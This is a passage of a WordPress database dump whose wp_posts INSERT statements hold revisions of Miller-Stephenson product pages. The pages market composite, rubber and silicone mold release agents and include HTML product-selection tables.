Cure</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\n</tr>\n</tbody>\n</table>\n<h3>Technical or Application Support:</h3>\n<ul>\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\n</ul>\n&nbsp;\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;', 'Rubber & Silicone Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2886-autosave-v1', '', '', '2016-11-09 15:25:24', '2016-11-09 15:25:24', '', 2886, 'https://www.miller-stephenson.com/2886-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2963, 3, '2016-11-09 15:16:27', '2016-11-09 15:16:27', '<h1>Composite Mold Release Agents - ReleaSys™</h1>\r\nMiller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite material in the industry. Our formulations are uniquely tailored to yield unmatched utility and efficient for the robust and constantly evolving composite industry. These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistance, and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\r\n<ul>\r\n 	<li>Low or No volatile organic compounds (VOC)</li>\r\n 	<li>Minimal odor; 100% Non-flammable formulations</li>\r\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\r\n 	<li>Higher productivity; Increased cost-effectiveness</li>\r\n 	<li>Low rejection rate; Consistent part quality</li>\r\n</ul>\r\nMiller-Stephenson composite <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/">mold release agents</a> have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\r\n<ul>\r\n 	<li>Thermoset Epoxies, Phenolics, and BMIs</li>\r\n 	<li>Thermoset Prepregs</li>\r\n 	<li>Potting and Casting Resins</li>\r\n 	<li>Hand lay-ups</li>\r\n 	<li>Filament Winding</li>\r\n 	<li>Autoclave molding</li>\r\n 	<li>Vacuum bag molding</li>\r\n 	<li>Resin transfer molding</li>\r\n 	<li>Resin film infusion</li>\r\n 	<li>Compression, Transfer, Injection Molding</li>\r\n 	<li>Rotational Molding</li>\r\n 	<li>Metallic, Ceramic, and Composite Tooling</li>\r\n</ul>\r\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\r\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys semi-permanents mold release agents</a> and<a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/"> PTFE Dry Film release agents</a>, along with our industry leading support network, brings significant operational benefits.\r\n<ul>\r\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\r\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\r\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\r\n 	<li>Cost-effective, high durability, and consistent mold release</li>\r\n 	<li>Reduced downtime and scrap rates</li>\r\n 	<li>Minimal mold fouling and transfer</li>\r\n</ul>\r\n<h2><strong>Release Agent Selection Guide:</strong></h2>\r\n<table width="751">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product Type</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Application</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Finish</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="151">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="203">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Description</span></strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="font-size: 110%;">ReleaSys 8500</span></a></strong></td>\r\n<td style="text-align: center;">Medium  Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\r\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\r\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong> or <strong><a href="https://www.miller-stephenson.com/product/ptfe-mold-release-agents/">MS-143TE</a></strong></span></td>\r\n<td style="text-align: center;">PTFE Dry Film</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="font-size: 110%;">ReleaSys 8800</span></a></strong></td>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability; High Slip</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\n&nbsp;', 'Composite Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-11-09 15:16:27', '2016-11-09 15:16:27', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2964, 2, '2016-11-09 15:22:52', '2016-11-09 15:22:52', '<h1 style="text-align: justify;"><strong>Pioneering Rubber Mold Release Agents &amp; Silicone Mold Release Agents</strong></h1>\r\nSporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and robustness of rubber and silicone to solve complex mechanical issues.  As such, the molds to form these shapes and the requirements placed upon mold release agents have increased tremendously. In response, Miller-Stephenson has developed the most advanced rubber mold release agents and silicone mold release agents to meet and exceed all performance requirements in today\'s toughest molding challenges. For solutions to your rubber and silicone mold release problems you can rely on the <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson\'s flagship mold release line, <strong>ReleaSys</strong></a>™, and our worldwide reputation for unsurpassed expertise, consistent quality, and value. With products for both solvent based and water based applications, the ReleaSys line of mold release agents contribute to ensure efficient, cost effective, and high quality release of your molded parts.\r\n\r\nReleaSys Rubber Mold Release agents are recommended for releasing all natural and synthetic rubbers / elastomer compounds. Our release agents chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. Our specialized release agents eliminate rubber to metal bonding failures resulting in dramatically lower scrap rates. ReleaSys™ Silicone Mold Release agents offer superior durability, maximized surface adhesion and ease of release.\r\n<h2><span style="text-decoration: underline;"><strong>Low or No VOC, Minimal Odor, 100% Non-Flammable</strong></span></h2>\r\nOur ReleaSys™ mold release products, include <strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">solvent based</a></strong> and <a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong>water based</strong></a> mold release agents for general rubber goods, rubber-to-metal bonding, and silicones elastomers. Our solvent-based products utilize ultra low odor, low VOC and 100% non-flammable formulations dramatically reducing operator safety hazards and minimizing exposure. Water-based formulations are 100% VOC-free and yield the same reliable performance in a more environmentally friendly formulation.  Our water-based formulations are particular effective on technical rubber (ie: Neoprene, Nitrile) and silicone elastomer products, providing instantaneous cure and maximized durability.\r\n<h1>Application Guide For Rubber Mold Release Agents &amp; Silicone Mold Release Agents</h1>\r\n<table style="height: 1010px;" width="829">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Molding Substrate</span></span></td>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Application</span></span></td>\r\n<td style="text-align: center;" width="153"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Carrier Solvent </span></span></td>\r\n<td style="text-align: center;" width="144"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Product</span></span></td>\r\n<td style="text-align: center;" width="179"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Description</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High-Temperature</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Low Mold Building</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8500</span></strong></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Instantaneous Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">High Flow Injection Molding</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal Rejection Rate</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High Slip</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8800</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Highly Filled Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8500</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Release most compounds</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Multiple releases</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Rubber & Silicone Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2886-revision-v1', '', '', '2016-11-09 15:22:52', '2016-11-09 15:22:52', '', 2886, 'https://www.miller-stephenson.com/2886-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2965, 2, '2016-11-09 15:25:43', '2016-11-09 15:25:43', '<h1 style="text-align: justify;"><strong>Pioneering Rubber Mold Release Agents &amp; Silicone Mold Release Agents</strong></h1>\r\nSporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and robustness of rubber and silicone to solve complex mechanical issues.  As such, the molds to form these shapes and the requirements placed upon mold release agents have increased tremendously. In response, Miller-Stephenson has developed the most advanced rubber mold release agents and silicone mold release agents to meet and exceed all performance requirements in today\'s toughest molding challenges. For solutions to your rubber and silicone mold release problems you can rely on the <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson\'s flagship mold release line, <strong>ReleaSys</strong></a>™, and our worldwide reputation for unsurpassed expertise, consistent quality, and value. With products for both solvent based and water based applications, the ReleaSys line of mold release agents contribute to ensure efficient, cost effective, and high quality release of your molded parts.\r\n\r\nReleaSys Rubber Mold Release agents are recommended for releasing all natural and synthetic rubbers / elastomer compounds. Our release agents chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. Our specialized release agents eliminate rubber to metal bonding failures resulting in dramatically lower scrap rates. ReleaSys™ Silicone Mold Release agents offer superior durability, maximized surface adhesion and ease of release.\r\n<h2><span style="text-decoration: underline;"><strong>Low or No VOC, Minimal Odor, 100% Non-Flammable</strong></span></h2>\r\nOur ReleaSys™ mold release products, include <strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">solvent based</a></strong> and <a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong>water based</strong></a> mold release agents for general rubber goods, rubber-to-metal bonding, and silicones elastomers. Our solvent-based products utilize ultra low odor, low VOC and 100% non-flammable formulations dramatically reducing operator safety hazards and minimizing exposure. Water-based formulations are 100% VOC-free and yield the same reliable performance in a more environmentally friendly formulation.  Our water-based formulations are particular effective on technical rubber (ie: Neoprene, Nitrile) and silicone elastomer products, providing instantaneous cure and maximized durability.\r\n<h1>Application Guide For Rubber Mold Release Agents &amp; Silicone Mold Release Agents</h1>\r\n<table style="height: 1010px;" width="829">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Molding Substrate</span></span></td>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Application</span></span></td>\r\n<td style="text-align: center;" width="153"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Carrier Solvent </span></span></td>\r\n<td style="text-align: center;" width="144"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Product</span></span></td>\r\n<td style="text-align: center;" width="179"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Description</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High-Temperature</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Low Mold Building</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8500</span></strong></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Instantaneous Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">High Flow Injection Molding</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 115%;"><a 